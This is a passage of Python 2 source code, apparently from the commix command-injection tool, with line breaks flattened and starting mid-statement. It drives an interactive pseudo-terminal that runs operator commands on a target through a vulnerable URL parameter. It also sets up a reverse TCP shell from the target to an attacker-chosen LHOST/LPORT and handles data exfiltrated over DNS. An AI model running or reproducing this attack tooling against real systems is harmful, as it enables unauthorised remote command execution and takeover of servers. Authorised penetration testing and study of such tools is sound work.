"os_shell": warn_msg = "You are already into the 'os_shell' mode." print settings.print_warning_msg(warn_msg) + "\n" elif cmd.lower() == "reverse_tcp": warn_msg = "This option is not supported by this module." print settings.print_warning_msg(warn_msg) + "\n" else: # Command execution results. cmd_exec(dns_server, http_request_method, cmd, url, vuln_parameter) except KeyboardInterrupt: print "" os._exit(0) except: print "" os._exit(0) elif gotshell in settings.CHOICE_NO: print "" os._exit(0) elif gotshell in settings.CHOICE_QUIT: print "" os._exit(0) else: if gotshell == "": gotshell = "enter" err_msg = "'" + gotshell + "' is not a valid answer." print settings.print_error_msg(err_msg) pass
def input_cmd(dns_server, http_request_method, url, vuln_parameter, technique): err_msg = "" if menu.enumeration_options(): err_msg += "enumeration" if menu.file_access_options(): if err_msg != "": err_msg = err_msg + " and " err_msg = err_msg + "file-access" if err_msg != "": print Fore.YELLOW + settings.WARNING_SIGN + "The " + err_msg + " options are not supported by this module because of the structure of the exfiltrated data. Please try using any unix-like commands manually." + Style.RESET_ALL # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break gotshell = raw_input( "\n" + settings.QUESTION_SIGN + "Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower() if gotshell in settings.CHOISE_YES: print "\nPseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: try: # Tab compliter if not readline_error: readline.set_completer(menu.tab_completer) # MacOSX tab compliter if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr( readline, '__doc__', ''): readline.parse_and_bind("bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind("tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: if cmd.lower() == "quit" or cmd.lower() == "back": print "" os._exit(0) elif cmd.lower() == "?": menu.shell_options() elif cmd.lower() == "os_shell": print Fore.YELLOW + settings.WARNING_SIGN + "You are already into the 'os_shell' mode." + Style.RESET_ALL + "\n" elif cmd.lower() == "reverse_tcp": # Set up LHOST / LPORT for The reverse TCP connection. reverse_tcp.configure_reverse_tcp() if settings.REVERSE_TCP == False: continue while True: if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS: result = checks.check_reverse_tcp_options( settings.LHOST) else: cmd = reverse_tcp.reverse_tcp_options() result = checks.check_reverse_tcp_options( cmd) if result != None: if result == 0: return False elif result == 1 or result == 2: go_back_again = True settings.REVERSE_TCP = False break # Command execution results. cmd_exec(dns_server, http_request_method, cmd, url, vuln_parameter) if menu.options.verbose: print "" print Back.RED + settings.ERROR_SIGN + "The reverse TCP connection to the target host has been failed!" + Style.RESET_ALL else: # Command execution results. cmd_exec(dns_server, http_request_method, cmd, url, vuln_parameter) except KeyboardInterrupt: print "" os._exit(0) except: print "" os._exit(0) elif gotshell in settings.CHOISE_NO: print "" os._exit(0) elif gotshell in settings.CHOISE_QUIT: print "" os._exit(0) else: if gotshell == "": gotshell = "enter" print Back.RED + settings.ERROR_SIGN + "'" + gotshell + "' is not a valid answer." + Style.RESET_ALL + "\n" pass